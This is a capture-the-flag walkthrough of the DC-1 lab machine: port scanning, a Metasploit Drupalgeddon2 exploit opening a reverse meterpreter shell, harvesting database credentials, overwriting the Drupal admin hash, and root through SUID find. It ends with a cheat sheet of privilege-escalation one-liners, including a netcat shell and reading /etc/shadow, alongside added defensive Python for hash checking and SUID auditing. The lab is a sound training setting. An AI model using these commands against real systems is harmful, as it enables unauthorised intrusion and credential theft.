DC-1

Kali: 192.168.32.135
Target: 192.168.32.140

arp-scan -l finds the target's IP; then nmap scans the ports: nmap -sV -p- 192.168.32.140

root@kali:~# nmap -sV -p- 192.168.32.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:36 EDT
Nmap scan report for 192.168.32.140
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
52962/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:03:D1:4E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/su
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds

There is a web service. Browsing to it and running it through the Yunxi (云悉) fingerprinting service gives:

Category             Product   Version
CMS                  Drupal    7
Web server           Apache    2.2.22
Language             PHP       5.4.45
Operating system     Debian
JavaScript library   jQuery    1.4.4

MSF to the rescue! Search straight away for exploitable Drupal vulnerabilities; 7 come up. Picking a newer one is the safer bet, and the 2018 one looks fine.

msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.32.135   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.32.140
rhost => 192.168.32.140
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.32.135:4444
[*] Sending stage (38288 bytes) to 192.168.32.140
[*] Meterpreter session 1 opened (192.168.32.135:4444 -> 192.168.32.140:58870) at 2020-07-28 09:15:03 -0400

The meterpreter > prompt means the shell came back. Run python -c 'import pty;pty.spawn("/bin/bash")' to get an interactive terminal, then move on and list the files in the current directory.

www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt       LICENSE.txt      cron.php     misc        sites
INSTALL.mysql.txt   MAINTAINERS.txt  flag1.txt    modules     themes
INSTALL.pgsql.txt   README.txt       includes     profiles    update.php
INSTALL.sqlite.txt  UPGRADE.txt      index.php    robots.txt  web.config
INSTALL.txt         authorize.php    install.php  scripts     xmlrpc.php

cat flag1.txt.

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

It wants me to find a config-type file, inside the CMS. Lazy-dog trick as always: the find command. Along the way I learned that Drupal's default settings file is called settings.php.

www-data@DC-1:/var/www$ find -name 'settings.php'
find -name 'settings.php'
./sites/default/settings.php
www-data@DC-1:/var/www$ cat ./sites/default/settings.php
cat ./sites/default/settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
......

That's flag2: brute force and dictionary attacks aren't the only way to gain access (and you will need access), so what can you do with these credentials? The file also gives away the database details, including a low-privilege account.

www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t

Once logged in, privilege escalation aside, there was something I'd always wanted to do but never dared: dump the whole database. (Skipped here.)

// list the databases
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| ......                      |
| users                       |
| ......                      |
+-----------------------------+
80 rows in set (0.00 sec)

The database has a huge number of tables; look at users first.

mysql> select * from users;
select * from users;
uid  name   pass
0
1    admin  $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
2    Fred   $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

The table has two accounts, presumably Drupal accounts, but the passwords are stored as a special hash and can't be read. After reading the big shots' write-ups I learned you can use Drupal's own hashing script to change a password. Here's how:

www-data@DC-1:/var/www$ cd scripts
cd scripts
www-data@DC-1:/var/www/scripts$ cp -r ../includes ./
cp -r ../includes ./
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh  drupal.sh            generate-d6-content.sh  password-hash.sh
cron-curl.sh   dump-database-d6.sh  generate-d7-content.sh  run-tests.sh
cron-lynx.sh   dump-database-d7.sh  includes                test.script
www-data@DC-1:/var/www/scripts$ ./password-hash.sh Tr0jAn
./password-hash.sh Tr0jAn

password: Tr0jAn                hash: $S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5

That gives the hash for Tr0jAn; go back into the database and update the password.

mysql> update users set pass = '$S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Now I can go back and log in.
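For reference, the $S$ hash above is Drupal 7's phpass-derived format: '$S$', one character giving log2 of the SHA-512 round count ('D' = 15), an 8-character salt, and the hash truncated to 55 characters. The block below is an added Python port of Drupal 7's _password_crypt(), user_hash_password() and user_check_password() logic (example code, not the write-up's or Drupal's own): drupal7_hash() reproduces what password-hash.sh prints, drupal7_verify() checks a password against a stored hash such as the one above, and hash_cost() is a small audit helper for spotting low-cost or legacy hashes in a users table dump.

```python
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"  # password.inc alphabet
HASH_COUNT_LOG2 = 15  # Drupal 7 default cost: 2**15 SHA-512 rounds after the initial hash
HASH_LENGTH = 55  # stored hashes are cut to 55 characters


def _b64(data):
    """phpass-style base64 used by Drupal: little-endian 6-bit groups, no padding."""
    out = []
    for k in range(0, len(data), 3):
        chunk = data[k:k + 3]
        value = int.from_bytes(chunk, "little")
        for shift in range(0, 6 * (len(chunk) + 1), 6):  # 3 bytes -> 4 chars, 1 byte -> 2
            out.append(ITOA64[(value >> shift) & 0x3F])
    return "".join(out)


def drupal7_crypt(password, setting):
    """Port of _password_crypt('sha512', ...): the 55-char hash, or None if malformed."""
    setting = setting[:12]  # '$S$' + cost character + 8-character salt
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    log2 = ITOA64.find(setting[3])  # one character encodes log2(rounds)
    if not 7 <= log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        return None
    pw = password.encode()
    digest = hashlib.sha512(setting[4:12].encode() + pw).digest()
    for _ in range(1 << log2):  # 2**log2 further rounds, as in Drupal
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def drupal7_hash(password, salt=None):
    """What scripts/password-hash.sh prints: fresh random salt, default cost."""
    salt = salt or _b64(os.urandom(6))  # 6 random bytes -> 8 salt characters
    return drupal7_crypt(password, "$S$" + ITOA64[HASH_COUNT_LOG2] + salt)


def drupal7_verify(password, stored):
    """user_check_password() for $S$ hashes: rehash with the stored setting, compare."""
    return stored.startswith("$S$") and drupal7_crypt(password, stored) == stored


def hash_cost(stored):
    """Audit helper: log2 rounds of a stored $S$ hash, -1 for legacy/malformed ones."""
    if stored.startswith("$S$") and len(stored) == HASH_LENGTH:
        return ITOA64.find(stored[3])
    return -1
```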

The Dashboard shows flag3: Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Roughly, it's telling me how to find the password, but I need to exec the shadow (blank stare.jpg)

(After reading the big shots' articles again) at this point you first cat the password file and take a look:

www-data@DC-1:/var/www$ cat /etc/passwd
......
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

There's flag4; go to that directory and look at flag4.

www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

That's a hint that it's time to escalate privileges. The exciting moment has finally arrived.

SUID privilege escalation: find's -exec

SUID (set user ID) is a permission bit on a file; it shows up in the execute position of the owner's permissions, and a file with this bit set lets whoever runs it temporarily take on the file owner's privileges.

Common Linux executables that allow privilege escalation when SUID include: Nmap, Vim, find, Bash, More, Less, Nano, cp.

The find command can locate every SUID executable on the system, but what we want are files that have the SUID bit and are owned by root; redirecting all errors to /dev/null leaves only the binaries this user is allowed to access.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

/ means start at the top of the filesystem (the root) and descend into every directory
-perm means search for the permission bits that follow
-u=s matches files with the set-user-ID bit, i.e. ones that run as their owner (root)
-type means the type of file we are looking for
f means a regular file, not a directory or special file
2 means the process's second file descriptor, i.e. stderr (standard error)
> means redirect
/dev/null is a special filesystem object that discards everything written to it

www-data@DC-1:/$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
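Looking at that list the way a defender would, as an added example that is not part of the write-up: a small Python audit that flags any setuid file which is either a shell-capable binary (the names this post lists) or absent from a known-good baseline, plus a live scanner equivalent to the find command. The BASELINE set is assumed, constructed from the listing above with /usr/bin/find removed, and SAMPLE_FIND_OUTPUT is that same listing rebuilt inline.

```python
import os
import stat

# Names the write-up lists as able to hand out a shell when they run setuid-root.
SHELL_CAPABLE = {"nmap", "vim", "vim.tiny", "find", "bash", "more", "less", "nano",
                 "cp", "awk", "man", "python", "perl", "ruby", "lua", "tcpdump", "chmod"}

# Assumed known-good baseline, constructed here from the page's own listing with the
# planted entry removed; in practice it comes from a clean image or package metadata.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/sbin/exim4",
    "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
}

# Constructed sample input: the page's `find / -perm -u=s -type f` output.
SAMPLE_FIND_OUTPUT = "\n".join(sorted(BASELINE | {"/usr/bin/find"})) + "\n"


def audit_suid(find_output):
    """Map each suspicious setuid path to the reasons it was flagged."""
    findings = {}
    for path in (line.strip() for line in find_output.splitlines() if line.strip()):
        reasons = []
        if os.path.basename(path) in SHELL_CAPABLE:
            reasons.append("shell-capable binary: setuid here means root")
        if path not in BASELINE:
            reasons.append("not in baseline: unexpected setuid file")
        if reasons:
            findings[path] = reasons
    return findings


def scan_suid(root="/"):
    """Live equivalent of the find command: regular files, setuid bit set, owned by root."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable entries, like find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(full)
    return sorted(hits)
```

Feeding scan_suid() output into audit_suid() on a real host gives the same two-sided check: anything shell-capable or outside the baseline is what to review and, where nothing needs it, strip the bit with chmod u-s.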

find shows up in the results, so use it to escalate.

www-data@DC-1:/$ find ./ Tr0jAn -exec '/bin/sh' \;
# whoami
whoami
root
# find / -name '*flag*.txt'
find / -name '*flag*.txt'
/home/flag4/flag4.txt
/var/www/flag1.txt
/root/thefinalflag.txt
# cat /root/thefinalflag.txt
cat /root/thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

That completes the attack on DC-1. In a real engagement, though, after the MSF one-shot we should upgrade the shell into a more stable backdoor so it doesn't get killed.

Common SUID privilege-escalation commands

I've covered what SUID is in another article; go back and reread it if you've forgotten.

The find command for locating files with the SUID bit is given above, so I won't repeat it here.

vim

vim.tiny
#Press ESC key
:set shell=/bin/sh
:shell

find

find ./ Tr0jAn -exec '/bin/sh' \;

find+netcat

find Tr0jAn -exec netcat -lvp [Port] -e /bin/sh \;
netcat {ip:port}

bash

bash -p

less

less /etc/passwd
!/bin/sh

more

more /etc/passwd
!/bin/sh

ash, linux shell

sudo ash

awk

awk 'BEGIN {system("/bin/bash")}'

man

man passwd
!/bin/bash

python

import os
os.system("/bin/bash")

perl, ruby, lua, etc.

exec "/bin/bash"

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.Tr0jAn
chmod +x /tmp/.Tr0jAn
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.Tr0jAn -Z root

cp

sudo sh -c 'cp $(which cp) .; chmod +s ./cp'

chmod

sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'
Last modified: 2020-08-28 11:53 AM